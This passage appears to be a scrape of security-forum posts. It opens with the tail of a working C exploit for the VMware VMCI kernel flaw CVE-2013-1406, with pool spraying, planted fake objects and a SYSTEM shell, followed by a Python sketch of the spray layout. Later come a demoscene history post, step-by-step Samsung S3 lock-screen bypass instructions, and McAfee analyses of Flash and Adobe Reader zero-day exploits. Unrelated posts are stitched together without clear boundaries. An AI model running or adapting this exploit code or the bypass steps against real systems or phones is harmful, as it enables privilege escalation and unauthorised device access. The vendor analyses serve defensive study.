        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
        {
            DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR dwWindowAddress = 0;
            bool bPoolWindowFound = false;
            UINT iObjectsNeeded = 0;

            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);

            if (
                // Not on a page boundary
                ((dwTestObjAddr & 0xFFF) != 0) &&
                // Doesn't cross page boundary
                (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
               )
            {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
                {
                    continue;
                }

                for (unsigned int j = 1; j < iObjectsNeeded; j++)
                {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);

                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);

                    if (hLookedUp != NULL)
                    {
                        hHandlesToClose[j] = hLookedUp;

                        if (j == iObjectsNeeded - 1)
                        {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
                            {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;
                                dwWindowAddress = dwTestObjAddr;

                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++)
                                {
                                    if (hHandlesToClose[k] != NULL)
                                    {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else
                            {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else
                    {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }

                if (bPoolWindowFound)
                {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }
            }
        }
    }

    VirtualFree(pBuf, 0, MEM_RELEASE);
    return;
}

void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
    if (pBuf != NULL)
    {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }
    return;
}

void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
    /*
        Previous chunk size will always be 0x43 and the pool index will be 0,
        so the last bytes will be 0x0043.

        So, for every 0xXXXX0043 address we must satisfy the following conditions:

            lea     edx, [eax+38h]
            lock xadd [edx], ecx
            cmp     ecx, 1

        Some sort of lock at [addr + 0x38] must be equal to 1.

        And:

            call    dword ptr [eax+0ACh]

        The call site is located at [addr + 0xAC].

        Also fake the object to be dereferenced at [addr + 0x100].
    */
    if (pBuf != NULL)
    {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
        {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);

            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }
    return;
}

void PenetrateVMCI()
{
    /*
        VMware Security Advisory

        Advisory ID: VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
        Issue date:  2013-02-07
        Updated on:  2013-02-07 (initial advisory)
        CVE numbers: CVE-2013-1406
    */
    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;

    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));

    if (!InitKernelFuncs())
    {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }

    if (bXP)
    {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);
        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL)
        {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }

    if (b7 || b8)
    {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        si.wShowWindow = TRUE;

        WCHAR cmdPath[MAX_PATH] = {0};
        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");

        if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
        {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }

    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);

    if (hVMCIDevice != INVALID_HANDLE_VALUE)
    {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;

        printf("[+] VMCI service found running\n");

        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;

        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;

        if ((b7) || (bXP) || (b8))
        {
            /*
                Significant bits of a PoolType of a chunk define the following regions:

                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0        - 0xFFFFFFFF - Free chunk - no idea

                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2,
                define an additional region for Win7:

                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            pShellSprayBufStd  = VirtualAlloc((LPVOID)0xA000000,  0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd  = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000,  0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) ||
                (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL))
            {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }

            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);

            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);

            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
            {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }

            PoolSpray();

            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
            {
                printf("\t[!] If you don't see any BSOD, you're successful\n");
                if (b7 || b8)
                {
                    ResumeThread(hSuspThread);
                }
            }
            else
            {
                printf("[-] Not this time %d\n", GetLastError());
            }

            if (pShellSprayBufStd != NULL)
            {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }
            if (pShellSprayBufQtd != NULL)
            {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
        CloseHandle(hVMCIDevice);
    }
    else
    {
        printf("[-] Like I don't see vmware here\n");
    }

    CloseHandle(hProcessToElevate);
    return;
}

References

[1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011
[2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011
[3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008
[4] SoBeIt. How to exploit Windows kernel memory pool. X'con, 2005

Video Demonstration:

Author: Artem Shishkin, Positive Research.

Sursa: Positive Research Center: Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406
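The user-mode spray layout that InitFakeBuf() and PlaceFakeObjects() build can be sketched platform-independently in a few lines of Python. This is illustrative only: the offsets 0x43/0x38/0xAC/0x100, the 0x10000 step, and the 0x11 filler come from the article, while the two 32-bit addresses are made up for the demo.

```python
import struct

STEP      = 0x10000   # one fake object per 64 KB of sprayed memory
CHUNK_OFF = 0x43      # fake chunk header: prev size 0x43, pool index 0 -> 0xXXXX0043
LOCK_OFF  = 0x38      # "lock xadd [edx], ecx" expects this dword to be 1
CALL_OFF  = 0xAC      # "call dword ptr [eax+0ACh]" reads its target here
DEREF_OFF = 0x100     # pointer handed to ObfDereferenceObject()

def place_fake_objects(buf, shell_addr, deref_addr):
    """Mirrors PlaceFakeObjects(): stamp the three fields at every step."""
    for base in range(CHUNK_OFF, len(buf) - DEREF_OFF - 4, STEP):
        struct.pack_into('<I', buf, base + LOCK_OFF, 1)
        struct.pack_into('<I', buf, base + CALL_OFF, shell_addr)
        struct.pack_into('<I', buf, base + DEREF_OFF, deref_addr)

spray = bytearray(b'\x11' * (2 * STEP))   # InitFakeBuf() fills the region with 0x11
place_fake_objects(spray, 0xDEAD0000, 0x0A001000)

# Any dispatch that lands on a 0xXXXX0043 address now finds lock == 1
# and the planted call target at +0xAC.
assert struct.unpack_from('<I', spray, CHUNK_OFF + LOCK_OFF)[0] == 1
assert struct.unpack_from('<I', spray, CHUNK_OFF + CALL_OFF)[0] == 0xDEAD0000
```

The real PoC does the same stamping over four 32 MB regions mapped at the addresses a misinterpreted pool header can decode to.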
  17. How Scary Can An Old-School Programmer Be?

March 5, 2013
Tyler Durden

Recently Eugene Kaspersky wrote in his blog a post about the so-called Big Comeback of old-school virus writers. I am old enough to remember those guys and their brilliant work – I don't necessarily mean malware creators; I'm talking about programmers, coders and assembler masters. They are like the Jedi and the Sith of the Old Empire, whom all the heroes of the Skywalker saga considered far more powerful and skilled with light sabers (no kiddin', ask Yoda). And I thought… damn… there are probably around 3 people left out there who witnessed the true power of those people (me, Kaspersky and Bill Gates). Seriously, since it is quite hard to grasp what an old-school hacker is capable of, I decided to show you what Eugene was talking about, so you can decide for yourself whether this is scary news.

Extreme workout for stupid calculators

Back in 1992 computers were basically smart calculators with big screens (this is not a joke, kids). But there were several groups of enthusiasts who were happy to face software challenges: some programmers managed to write code that used every byte of memory, every processor function and register, every OS command and, most importantly, 100% of the hardware's power – they squeezed it all to the last drop and checked out the result. I have to point out that in order to truly nail those tasks, one has to be damn creative, drink a lot of coffee (or smoke a lot of weed, let's be honest) – and have an insane IQ. The movement itself started around 1988, basically together with the first more or less widely spread version of MS-DOS. It had no official name, but according to the laws of evolution, sooner or later its members would have to compete. And this is how "Assembly" was born in 1992.
Future Crew is back from the future

In 1992 a group of Scandinavian coders called "Future Crew", together with their friends from the "Complex" and "Amiga" programming groups, organized an event called "The Assembly" in order to share the results of their kick-ass work in assembler and compete for the title of the Best Coder of the year. There were several disciplines, but the two most interesting were the platform demos (PC, Amiga, C64) and the PC 64k intros. The first had the goal of demonstrating the most elegant coding solutions and the best abilities of the hardware with minimalistic, optimal code. The second was a tricky one: coders were limited to 64kb – their compiled, ready-to-run file(s) could not be more than 64 kilobytes – which is why this nomination turned out to be a contest of codin' elegance.

A coding demo is basically a scripted series of events programmed to demonstrate the capabilities of hardware and/or top software solutions for a particular task, such as complex physics calculations.

Back in 1992 the Future Crew won the competition with their "Unreal" demo. Here it is (note that this is 1992 and there's no Windows yet; this demo was called Unreal for a reason – nobody(!) had done anything like it before): They were the first to demonstrate a working 3D environment model, layers of graphics, complex physics and lighting calculations, etc. And the whole compiled code was about 1 megabyte (including the music! – and let me point out that there was no mp3 compression yet). The only way to achieve such a result was mastering assembler – in my opinion, the most complex programming language ever. Just so you have an idea of what assembler is, here is what the guys from Future Crew told me years ago:

Learning to code demos is a long and very very difficult process. It takes years to learn to code demos very well. A good way to start is some high-level language like Pascal or C, and then start to experiment with assembler.
It takes a lot of time and experimenting to get better, and there are no shortcuts. The main thing is trying to understand what you do, then trying to change the program to see what you get, and gaining wisdom about the best way of doing things. Learning to code well requires a lot of patience, a lot of enthusiasm and a lot of time. It is not easy.

Basically, those who were engaged in the competition turned out to become The Ultimate Source of inspiration for all software developers. I'm not saying that someone was stealing their ideas, no – everyone was just… adopting their creative vision. Most products we have today – ALL GAMES, Adobe graphics and video products, meteo and GPS software, Google Earth… all of those multibillion-dollar products were inspired by Assembly at some point. (BTW – filming and photo shooting are strictly forbidden inside the event's room – violators are banned forever.)

1993 – the year of "Second Reality" and Eclipse

The Assembly turned out to be such a success that the next year the number of attendees and presented demos doubled (the trend was pretty constant; since 1999 the Assembly has taken place in the biggest football arena in Helsinki, Finland, which fits ~5000 attendees from all over the globe). In 1993 Future Crew presented something… fantastic, something that set the quality bar for all further contests and changed the programming world forever – the Second Reality demo:

It is essential to understand that this demo was created BEFORE Intel presented their Pentium processors (Intel announced the Pentium on 22 March, the first Pentium PCs shipped only in 1994, and the Assembly usually takes place in summer – July/August. That means Future Crew showed it at least half a year before Pentium shipments started). It means that all those fantastic graphics and sounds ran on 486 CPUs with primitive sound blasters and no graphics cards.
This demo blew away the jury and the coding community – it showed what results could be achieved with pro-level assembler work and a minimalistic approach (the compiled code of Second Reality was about 1.5 megabytes). This year made Future Crew world famous. This is a "behind the scenes" video of Future Crew working on Second Reality:

In 1994, the demo "Verses" (by the EMC group) won first place. Basically, they showed the world that realistic water-physics calculations could be done and that any morphing of 3D objects within the Pentium's speed limit was a piece of cake: And this 64kb winner – "Airframe" by the Prime group – is the mother and father of all modern 3D aviation and space simulators:

Just so you get an idea of how quickly the code evolved, here's a list of all winners from 1995 to 2012.

1995 Assembly Winner: "Stars" by NoooN group
1996 Assembly Winner: "Machines of Madness" by Dubius group
1997 Assembly Winner: "Boost" by Doomsday group
1998 Assembly Winner: "Gateways" by Trauma group
http://www.youtube.com/watch?feature=player_embedded&v=QgGmbqIqX_A

By the way – this is the ancestor of World of Warcraft's visual realisation. This is when the 3D MMORPG visuals were created. In 1999 the 3DFX technology changed graphics forever. And the demo by the MatureFunk group called "Virhe" blew everybody's minds away:

Assembly revised

In 2000 the rules changed a bit – instead of competing in 3 categories (Amiga, PC and C64), they started to compete in the "Combined Demo", "Oldschool demo" and "64kb limit intro" categories. The 64k competition became obsolete in 2010, but at the end of this post you'll see some really fantastic examples of what a pro assembler coder can fit within 64 kilobytes. This is the list of winners in the Combined Demo category, which is the most brilliant in terms of assembler mastery:

2000 first prize winner was "Spot" by the Exceed group. Check out the lighting effects… they are amazing – remember, this is 13-year-old technology!
2001 Assembly Winner was "Lapsuus" by the Maturefurk group.

2002 Assembly winner was "Liquid… Wen?" by the Haujobb group:
http://www.youtube.com/watch?feature=player_embedded&v=Ae8UK9mscWg

I have to point out that all graphics, including faces and characters, in all Assembly demos are drawn ONLY by the code – those are not picture files included in the demo. No, sir!

2003 Assembly Winner was "Legomania" by Doomsday. Say hello to all 3D console games:) And I'm sure that this is when the new Nintendo Wii vision was born:
http://www.youtube.com/watch?feature=player_embedded&v=gU70QGtkUm0

2004 first prize went to "Obsoleet" by Unreal Voodoo:
http://www.youtube.com/watch?feature=player_embedded&v=MUWskk0k6XU

2005 first prize of Assembly went to "Iconoclast" by the ASD group:
http://www.youtube.com/watch?feature=player_embedded&v=CAKMa8-LA9w

In 2006 the demo "Starstruck" by The Black Lotus coding group blasted the community again with the level of sophistication of its graphics coding. I'd say they raised the bar a lot:
http://www.youtube.com/watch?feature=player_embedded&v=-wtMEBPWeMo

2007 winner of Assembly was "LifeForce" by ASD.
And this was, once again, a piece of fantastic assembler work:
http://www.youtube.com/watch?feature=player_embedded&v=PDWGLLJLLLk

2008 was the year of "Within Epsilon" by Pyrotech:
http://www.youtube.com/watch?feature=player_embedded&v=4YvYnHvhI_E

The 2009 winner is one of my personal favourites – "Frameranger" by the Fairlight, CNCD & Orange groups:
http://www.youtube.com/watch?feature=player_embedded&v=luhHghCAEaQ

In 2010 "Happiness is right around the bend" by ASD showed a fantastic tank:
http://www.youtube.com/watch?feature=player_embedded&v=z8wfYd9Y-_4

2011 Assembly winner was "Spin" by ASD:
http://www.youtube.com/watch?feature=player_embedded&v=T_U3Zdv8to8

2012 was phenomenal – "Spacecut" by Carillon & Cyberiad (CNCD):
http://www.youtube.com/watch?feature=player_embedded&v=eJF-kdutNxs

64 kilobytes limit best examples

Just so you get an idea of what a professional programmer can do within 64 kilobytes: this is the best of 2005 – "Che Guevara" by Fairlight:
http://www.youtube.com/watch?feature=player_embedded&v=bG-6PbGKzcE

I repeat – this is 64 kilobytes of assembler code. Not a byte more. But 3 years later, in 2008, the same group demonstrated immense technological progress and managed to fit within 64kb a demo like this one – "Panic room" – and won the first prize in this category:
http://www.youtube.com/watch?feature=player_embedded&v=MQZ1qGENxP8

But the best 64k demo EVER presented was "X marks the spot" by Portal Process in 2010 – first prize winner of Assembly in the 64k category:
http://www.youtube.com/watch?feature=player_embedded&v=OhAx2c0U5WA

And now… let me draw you a small picture here… All those demos, especially the ones limited to 64kb, show the results a talented old-school programmer can deliver when he puts his mind to it – but, more importantly, when he is a Master of Assembler. That is not very common nowadays, when most products are created with visual, so-called "high-level" programming languages, such as Visual C++ and Objective-C.
Just imagine for a second that a programmer like this, or a group like Future Crew, decides to screw all the 3D creativity, music and physics, get rid of all this enthusiasm and focus on just one goal – creating a small piece of code that steals your financial data or helps to re-calibrate a nuclear reactor. Do you think they would succeed? How long would the code be, if 64 kilobytes is more than enough? Would they find a way to break the integrated security systems of Windows or Apple? Are they mobile? Are they flexible? Do they have the finances to make this happen, if they were running free 5000-attendee events for 20 years?

I don't want to tell you the answer. You have to decide for yourself. But when I hear someone saying "My PC does not require protection", I can't help but remember "Second Reality" and start praying. Thank God the guys who were Future Crew are now very busy: if you're the best at coding demos, why not make it your business, right? Next time you run a 3DMark 2011 test on your PC – think of Unreal, Second Reality and Future Crew.

Future Crew as a team did not release anything after Scream Tracker 3 (December 1994). While it was never officially dissolved, its members parted ways in the second half of the 1990s. Companies like Futuremark (3DMark), Remedy (Death Rally, Max Payne, Alan Wake), Bugbear Entertainment (FlatOut, Glimmerati, Rally Trophy), Bitboys (a graphics hardware company) and Recoil Games (Rochard) were all started in whole or in part by members of Future Crew.

I want to thank all of them – they changed the world forever and showed us that everything is possible if you put your mind to it. Including Kaspersky Internet Security. Thank you for your inspiration, guys. And deep inside my head I hope that not a single programmer who was part of The Assembly would ever use his/her skills for evil purposes.

Sursa: How Scary Can An Old-School Programmer Could Be?
  18. Samsung S3 Full Lock Screen Bypass

Authored by Sean McMillan

The Samsung S3 suffers from a full lock screen bypass vulnerability that leverages the emergency call functionality.

====Title====
Samsung S3 : Full Lock Screen Bypass

========Summary========
It is possible to bypass the lock screen on the S3, allowing an individual full access to the phone's features.

==============Steps to recreate==============
1) On the code entry screen press Emergency Call
2) Then press Emergency Contacts
3) Press the Home button once
4) Just after pressing the Home button press the power button quickly
5) If successful, pressing the power button again will bring you to the S3's home screen

=====Notes=====
1) It can take quite a few attempts to get this working; sometimes this method works straight away, other times it can take more than 20 attempts.
2) The method has been tested on 3 S3's
3) The method also seems to work better when the mobile has auto rotation on.

================Tested phone details================
Model number: GT-I9300
Android Version: 4.1.2
Kernel version: 3.031-742798

Sursa: Samsung S3 Full Lock Screen Bypass ? Packet Storm
  19. Adobe Flash Zero-Day Attack Uses Advanced Exploitation Technique

Monday, February 11, 2013 at 3:31pm by Haifei Li

On February 7, Adobe issued a security bulletin warning of zero-day attacks that leverage two Flash vulnerabilities. One (CVE-2013-0634) is related to ActionScript regular expression handling. (Some sources refer to this vulnerability as CVE-2013-0633. We are waiting for Adobe to confirm the proper CVE ID.) McAfee Labs rapidly responded to the threat. While digging deep into the original sample, we found that the exploit uses highly sophisticated exploitation techniques to attack various Flash Player versions. It also includes "user-friendly" tricks that give no signs or symptoms to its victims.

The ingenious exploit uses a previously unknown technique to craft the heap memory in Flash Player. With the aid of a regular-expression-handling vulnerability that is related to a heap-based buffer overflow, the attack can create a highly reliable memory information leak that allows the exploit to bypass the usually effective exploitation mitigations of address space layout randomization (ASLR) and data execution prevention (DEP) on Windows 7 and other versions.

More important, the technique looks like a generic exploitation approach for Flash Player. The vulnerability itself actually doesn't help much: it just overwrites a few bytes that are treated as the "element number" field of a specific ActionScript object. These traits show that the exploitation technique is not limited to this particular Flash vulnerability; it may apply to other Flash or non-Flash vulnerabilities. McAfee Labs has learned the full details of this exploitation technique and plans to publish our analysis in the near future. Watch this space for updates.

At this moment, considering how dangerous the attack is, we strongly recommend that all users update their Flash Players. The official patch is available here.
Though the patch doesn't kill all exploitation techniques, it will keep systems immune to the current exploits in the wild. For McAfee customers, various protections are provided. We have released signature "0x402df600_HTTP_Adobe_Flash_Player_CFF_Heap_Overflow_Remote_Code_Execution" for the exploits related to CVE-2013-0633 and "0x402df700_HTTP_Adobe_Flash_Player_ActionScript_Buffer_Overflow_Remote_Code_Execution" for CVE-2013-0634 for the Network Security Platform appliances. Also, the generic buffer overflow prevention feature in our HIPS products will stop the related attacks. Thanks to Bing Sun, Xiaobo Chen, and Chong Xu for their help with this analysis.

Analyzing the First ROP-Only, Sandbox-Escaping PDF Exploit

Friday, February 15, 2013 at 4:05pm by Xiao Chen

The winter of 2013 seems to be "zero-day" season. Right after my colleague Haifei Li analyzed the powerful Flash zero day last week, Adobe sent a security alert for another zero-day attack targeting the latest (and earlier) versions of Adobe Reader. Unlike the Internet Explorer zero-day exploits that we have seen in the past, this Reader zero-day exploit is a fully "weaponized" affair. It contains advanced techniques such as bypassing address space layout randomization/data execution prevention by using memory disclosure, and a sandbox escape in the broker process. In this blog we will give a brief analysis of the exploitation.

The malicious PDF file used in this exploitation consists mainly of three parts:

- Highly obfuscated JavaScript code, containing heap-spray data with a return-oriented programming (ROP) payload and the JavaScript code that manipulates Adobe XML Forms Architecture (XFA) objects to trigger the vulnerability
- A flat-encoded XFA object
- An encrypted binary stream, which we believe is related to the two dropped DLLs

The exploitation has two stages. The first-stage code execution inside the sandboxed process happens in the AcroForm.api module.
A vtable pointer will be read from the attacker-controlled heap-spray area and later will be used in the call instruction. This exploit can leak the base-module address of AcroForm.api. The embedded JavaScript code is used to detect the current version of Adobe Reader, and all the ROP payload can be built at runtime. Most important, there is no traditional shellcode at all! All the required shellcode functions are implemented in the ROP code level. That means most emulation-based shellcode-detection techniques will fail in detecting such an exploitation, because those techniques see only a bunch of addresses within a legitimate module. It’s similar to the old iOS jailbreak exploit that can be used to defeat the iOS code-signing enhancement. The ROP shellcode first decrypts an embedded DLL (D.T) in memory and drops it to the AppData\Local\Temp\acrord32_sbx folder. Then, it loads the DLL into the current process. After that, the hijacked thread suspends itself by calling Kernel32!Sleep API. When D.T runs in the sandboxed process, it drops other DLLs (L2P.T, etc.) and is ready to escape the sandbox by exploiting another Adobe vulnerability. The second-stage code execution occurs inside the broker process. The destination of the call instruction can also be controlled by the attacker. The second-stage ROP shellcode is very short. It simply loads the dropped DLL L2P.T and goes into a sleep state. At this point, the exploit has already successfully broken out of the Reader sandbox because the attacker-controlled code (L2P.T) managed to run in the high-privileged broker process. This is the first in-the-wild exploit we have seen that has fully escaped the sandbox. Previously, we had only heard of the possibility of full sandbox escaping at a top hacking competition such as pwn2own. 
Besides the complicated exploitation portion, this exploit also uses multiple evasion techniques such as highly obfuscated JavaScript, ROP-only shellcode, and multistaged encrypted malware to bypass network and endpoint security detection and protection. After succeeding, the exploit code exits the hijacked process and creates new processes to render a normal PDF file. The exploitation happens in a split second; thus the victim who opens that original malicious PDF file will not observe any abnormal behavior.

We will continue our analysis and provide more detail later on the sandbox escape. For now, we strongly recommend that all Reader users enable protected view and disable JavaScript (Edit -> Preferences -> JavaScript -> Uncheck the "Enable Acrobat JavaScript" option) until Adobe releases a patch. For McAfee customers, we have released signature 0x402e0600 "UDS-HTTP: Adobe Reader and Acrobat XFA Component Remote Code Execution" for the Network Security Platform appliances. Also, the generic buffer overflow prevention (Sigs 6013 and 6048) feature on our HIPS product will help to stop related attacks. Thanks to Bing Sun, Chong Xu, and Haifei Li for their help with this analysis.

Digging Into the Sandbox-Escape Technique of the Recent PDF Exploit

Wednesday, February 20, 2013 at 5:37pm by Xiao Chen

As promised in our previous blog entry for the recent Adobe Reader PDF zero-day attack, we now offer more technical details on this Reader "sandbox-escape" plan. In order to help readers understand what's going on there, we first need to provide some background.

Adobe Reader's Sandbox Architecture

The Adobe Reader sandbox consists of two processes: a high-privilege broker process and a sandboxed renderer process; the latter is responsible for rendering the PDF document. Please see Adobe's ASSET blog for an illustration of the sandbox architecture. The renderer process has restricted read/write access to the file system, registry, and named objects.
Most of the native OS API calls will go through the interprocess communication (IPC) mechanism to the broker process. For example, a native API call (CreateFile) originates from the sandboxed process, and the broker process eventually takes over as a proxy. Actually, the Reader sandbox's IPC is implemented based on Google Chrome's IPC shared-memory mechanism. The broker process creates a 2MB shared memory region for IPC initialization, the handle of the shared memory is duplicated and transferred to the sandboxed process, and all the communications leverage this shared memory. The API call request from the sandboxed process is stored in an IPC channel buffer (also called CrossCallParams or ActuallCallParams). The structure of the buffer is defined in the following format (from crosscall_params.h):

Here are some explanations for the fields:

- The first 4 bytes, the "tag," are the opcode for which function is being called
- "IsOnOut" describes the data type of the "in/out" parameter
- "Call return" has 52 bytes. It's a buffer used to hold the data returned from the IPC server.
- "Params count" indicates the number of parameters
- The parameter type/offset/size info indicates the actual parameters

The parameter type is an enum, defined as follows:

Escaping the Sandbox

The sandbox escape in this zero-day exploit is due to a heap-based overflow vulnerability that occurs when the broker process handles the call request for the native API "GetClipboardFormatNameW." The tag id for this API is 0x73. Here is the ActuallCallParams (IPC channel buffer) memory structure for the request in the exploit:

As marked by different colors above, the first DWORD is the tag id (0x73), and there are only two parameters for this API call (as indicated by the blue DWORD). The yellow DWORDs are the parameter types: type 6 means INOUTPTR_TYPE and type 2 means ULONG_TYPE.
The red DWORDs are the sizes of these parameters, so the first parameter is 0x9c bytes with the "in/out ptr" type and the second parameter is 4 bytes with the "long" type. Let's take a look at the definition of the parameters for the GetClipboardFormatNameW API. According to the preceding definition, the GetClipboardFormatNameW call would look like this:

GetClipboardFormatNameW(0xc19a, "BBBBBBBBBB......", 0x9c);

At first sight, this function call looks normal, with nothing malicious. Unfortunately, two issues lead to a heap overflow condition. First, Adobe Reader allocates the heap memory based on "cchMaxCount," while the correct size should be "cchMaxCount * sizeof(WCHAR)" because this is a Unicode API. In our case, the allocation size is only 0x9c bytes; that is incorrect. Second, the lower-level native API NtUserGetClipboardFormatName(), called by GetClipboardFormatNameW(), uses cchMaxCount * sizeof(WCHAR) as its "length" parameter when copying a string into the heap buffer. At this point the heap overrun happens!

There is a trick to triggering this heap overflow: pay attention to the first parameter. From the MSDN description, the parameter "format" selects which registered clipboard format's name to retrieve. So if we can register in advance a format whose name requires a longer buffer, then later, when the broker calls GetClipboardFormatNameW() to retrieve that name, it will trigger the overflow. In this sandbox-escaping exploit, the malware calls RegisterClipboardFormatW() to register a format name that is much longer than 0x9c bytes. Finally, an object (vtable) on the heap is overwritten.

However, the story is not over yet. To achieve reliable exploitation, a heap spray inside the broker process is needed. The attacker did this in a very smart way: he or she leveraged the "HttpSendRequestA" function (tag id 0x5d). See the following dumped memory for this function call request.
Because the fourth parameter (lpOptional) has the type VOIDPTR_TYPE (its address and size are highlighted in red) in the exploit, the attacker passes the buffer size 0x0c800000 (the second red section). Because the size is huge, when the IPC server calls the ReadProcessMemory API to read the buffer, the broker process's heap will be sprayed with attacker-controlled data at a predictable memory location.

The ASLR- and DEP-bypassing part is very easy, because the module base addresses of the broker process and the sandboxed process are the same. The attacker can directly use a ROP code chain to defeat both ASLR and DEP.

Adobe has now released the official patch for these critical vulnerabilities. As always, we strongly suggest that users apply the patch as soon as possible. For McAfee customers, you'll find our solutions in our previous post. Thanks again to Bing Sun, Chong Xu, and Haifei Li for their help with this analysis.

Sources:
